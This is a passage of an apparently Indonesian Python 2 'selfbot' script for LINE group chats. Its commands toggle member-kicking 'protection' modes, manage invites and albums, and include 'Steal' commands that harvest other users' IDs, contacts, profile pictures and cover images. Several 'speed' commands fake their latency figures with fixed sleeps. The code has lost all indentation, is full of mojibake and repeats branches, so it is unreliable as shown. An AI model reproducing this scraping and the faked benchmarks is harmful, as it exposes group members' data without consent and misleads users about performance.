wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.to in wait['pname']:
cl.sendText(msg.to,"???? Oƒƒ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"??????? Oƒƒ")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"??O???? ????????O? Oƒƒ")
except:
pass
if "Mode off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ?????? ???")
else:
cl.sendText(msg.to,"No have access Protect")
except:
pass
#==========================================================================
elif msg.text in ["Invite on","invite on"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"?????? O?.")
else:
cl.sendText(msg.to,"??????? O?")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"???? Oƒƒ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"??????? Oƒƒ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"??O???? ????????O? O?")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"??O???? ????????O? Oƒƒ")
except:
pass
elif "Protect on" == msg.text:
if msg.to in protection:
cl.sendText(msg.to,"Protect ??????? ??")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ?????? ??")
elif "Protect off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ?????? ???")
else:
cl.sendText(msg.to,"Protect ??????? ???")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Tarik"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
elif msg.text in ["Jepit"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite on","invite on"]:
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite off","Invite off"]:
if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join on","Auto join on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join off","Auto join off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°?组ç???¨è‡ªåŠ¨é‚€è¯·æ???’ç»?")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Leave off","Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦?了关æ–。")
elif msg.text in ["menu","status"]:
if msg.from_ in admin:
md = "?Status Proteksi?\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["Protectcancel"] == True: md+="[•]Protect Cancel [On]\n"
else: md+="[•]Protect Cancel [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n?? ???+? ? ¥ûDÏ ? ?+??? ??\n*============*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "Album merit " in msg.text:
gid = msg.text.replace("Album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç???¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "Album " in msg.text:
gid = msg.text.replace("Album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "Album remove " in msg.text:
gid = msg.text.replace("Album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "Album removeat’" in msg.text:
gid = msg.text.replace("Album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Add on","Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Add off","Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦?了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•?候語確èª?"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"?????????")
#---------------------Sc invite owner ke group------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é ?留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é ?留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦?了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp turunin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp naikin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turun lagi" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
